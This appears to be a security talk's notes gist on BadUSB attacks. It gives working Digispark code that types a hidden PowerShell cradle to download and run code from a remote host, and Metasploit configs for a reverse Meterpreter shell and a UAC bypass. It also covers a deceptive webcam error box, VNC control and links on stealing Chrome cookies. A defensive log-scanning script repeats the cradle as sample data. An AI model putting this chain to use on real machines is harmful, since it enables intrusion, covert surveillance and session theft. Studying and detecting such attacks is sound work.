Notes of Null talk on BadUSB
## Bad USB code

```cpp
#include "DigiKeyboard.h"
#define WorkingPin 1 // Just as an LED indicator, as to when the work is finished

void setup() {
  pinMode(WorkingPin, OUTPUT); // the LED pin must be configured as an output before digitalWrite() has any effect
}

void loop() {
  digitalWrite(WorkingPin, HIGH);
  DigiKeyboard.sendKeyStroke(0); // empty report, so the host has the keyboard enumerated before real keys arrive
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("powershell.exe -nop -w hidden -c $t=new-object net.webclient;$t.proxy=[Net.WebRequest]::GetSystemWebProxy();$t.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $t.downloadstring('http://192.168.1.2:8080/nFUICYVjGMT6a');");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  digitalWrite(WorkingPin, LOW);
  for (;;) {
    /* Stops the Digispark from running the script again */
  }
}
```
## Metasploit resource file used in the demonstration: msf-web-delivery.rc

```
use exploit/multi/script/web_delivery
set Target 2
set LHOST <YOUR_LOCAL_IP_HERE>
set LPORT 6680
set payload windows/x64/meterpreter/reverse_tcp
# This step is necessary, otherwise the session just dies
set AutoRunScript post/windows/manage/migrate
exploit -j
```
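From the defender's side, the one thing this whole chain leaves on the host is the PowerShell download cradle that the Digispark types in (the same one `web_delivery` target 2 hands out). Below is an added example, not from the talk or any of the projects above, that scores log lines for that cradle pattern; the sample lines are constructed, shaped like the `CommandLine` field of a Windows 4688 event and the `ScriptBlockText` field of a PowerShell 4104 event, and the indicator weights are my own choice.

```python
import re

# Constructed sample log lines (not from the page), shaped like the CommandLine
# field of a Windows 4688 process-creation event and the ScriptBlockText field
# of a PowerShell 4104 event. Line 0 is the cradle the Digispark types in above.
SAMPLE_LOGS = [
    "4688 CommandLine=powershell.exe -nop -w hidden -c $t=new-object net.webclient;"
    "$t.proxy=[Net.WebRequest]::GetSystemWebProxy();"
    "$t.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
    "IEX $t.downloadstring('http://192.168.1.2:8080/nFUICYVjGMT6a');",
    "4688 CommandLine=notepad.exe C:\\Users\\alice\\report.txt",
    "4104 ScriptBlockText=Get-ChildItem -Path C:\\Users -Recurse | Measure-Object",
    "4688 CommandLine=powershell.exe -c Invoke-WebRequest https://updates.example.com/x.msi -OutFile x.msi",
]

# Each indicator is (name, pattern, weight). Weights favour the pair that makes a
# download cradle: fetching text over HTTP and handing it straight to IEX.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    ("no_profile", re.compile(r"-no(?:p|profile)\b", re.I), 1),
    ("web_client", re.compile(r"net\.webclient", re.I), 2),
    ("download_string", re.compile(r"\.downloadstring\(", re.I), 2),
    ("iex", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    ("proxy_creds", re.compile(r"GetSystemWebProxy|DefaultCredentials", re.I), 1),
    ("http_url", re.compile(r"https?://", re.I), 1),
]


def score_line(line):
    """Return (score, [matched indicator names]) for one log line."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(line)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def is_download_cradle(line, threshold=6):
    """True when a line both fetches over HTTP and executes the result in memory."""
    score, hits = score_line(line)
    fetches = "download_string" in hits or "web_client" in hits
    return score >= threshold and "iex" in hits and fetches


def scan(lines):
    """Return (index, score, hits) for every line that looks like a cradle."""
    return [(i, *score_line(l)) for i, l in enumerate(lines) if is_download_cradle(l)]


if __name__ == "__main__":
    for idx, score, hits in scan(SAMPLE_LOGS):
        print(f"line {idx}: score={score} hits={hits}")
```

Event 4688 only carries the command line when "Include command line in process creation events" is enabled, and 4104 needs script block logging turned on; without either, the keystrokes leave nothing for this to match. A plain `Invoke-WebRequest` download (line 3) scores low on purpose, so the rule keys on the fetch-and-IEX combination rather than on HTTP alone.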
## For popping up an innocuous message box before starting to capture webcam snaps

DEFCON 20: Weaponizing the Windows API with Metasploit: https://youtu.be/bdUT20fwwfI?t=1527

```ruby
railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10) # 0x10 is MB_ICONSTOP, taken from https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nf-winuser-messagebox
```

If the above doesn't work, you might need to prefix the command with `client` (as shown in the video), like this:

```ruby
client.railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10)
```
## For VNC

After getting a Meterpreter session: `run vnc`

Then connect with a VNC client on the "local machine".
## For privilege escalation (https://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit/)

```
use exploit/windows/local/bypassuac_comhijack
set payload windows/x64/meterpreter/reverse_tcp
set session 2
set LHOST <YOUR_LOCAL_IP_HERE>
exploit
```
## For extracting Google Chrome cookies, since extracting passwords would still require you to enter the OTP if 2FA is enabled:

https://mango.pdf.zone/stealing-chrome-cookies-without-a-password

You can follow the discussion here (quite interesting, if you ask me): https://news.ycombinator.com/item?id=18376323

There's a Metasploit module available too: https://github.com/rapid7/metasploit-framework/blob/9616a9f79de0b22bfd142f12affd74cecbbd4413/documentation/modules/post/multi/gather/chrome_cookies.md
## State of the art things

Bad USB cables: https://mg.lol/blog/badusb-cables/

O.M.G. cables: https://mg.lol/blog/omg-cable/

## Other Useful Things

DigiSpark Scripts Repo: https://github.com/CedArctic/DigiSpark-Scripts

#shamelessSelfPromotion Ahead :p

You can read my other blogs here: https://lud1161.github.io/ and here: https://lud1161.wordpress.com/
@vishwaskheriwal commented Jun 2, 2019:

Sir, can you provide a video on this topic?

@LuD1161 (Owner, Author) commented Jun 2, 2019:

Hello @vishwaskheriwal, sorry to break it to you, but the talk wasn't recorded and I am not getting enough time to make a tutorial for it and put it up online.
Feel free to join the talk, if and when it happens next.
